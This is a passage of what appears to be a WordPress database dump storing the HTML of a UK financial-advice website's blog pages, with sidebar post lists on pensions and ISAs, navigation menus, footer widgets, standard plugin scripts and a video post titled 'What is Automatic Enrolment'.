</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;	The New Individual Savings Accounts','Read about','inherit','closed','closed','','84-revision-v1','','','2017-09-21 17:36:49','2017-09-21 17:36:49','',84,'http://www.equalitywalk.org.uk/84-revision-v1',0,'revision','',0),(331,1,'2017-09-21 17:37:01','2017-09-21 17:37:01','<body class=\"single single-post postid-8772 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										What is Automatic Enrolment										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>What is Automatic Enrolment</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8772\" class=\"post-8772 post type-post status-publish format-video hentry category-video-2 post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">What is Automatic Enrolment</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe class=\"wistia_embed\" src=\"http://fast.wistia.net/embed/iframe/r27jwb95gy\" name=\"wistia_embed\" width=\"640\" height=\"388\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../automatic-enrolment/\" title=\"Comment on What is Automatic Enrolment\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;p[title]=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=What+is+Automatic+Enrolment%20http://www.equalitywalk.org.uk/automatic-enrolment/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;title=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;title=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fautomatic-enrolment%2F&amp;name=What+is+Automatic+Enrolment&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/automatic-enrolment/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', 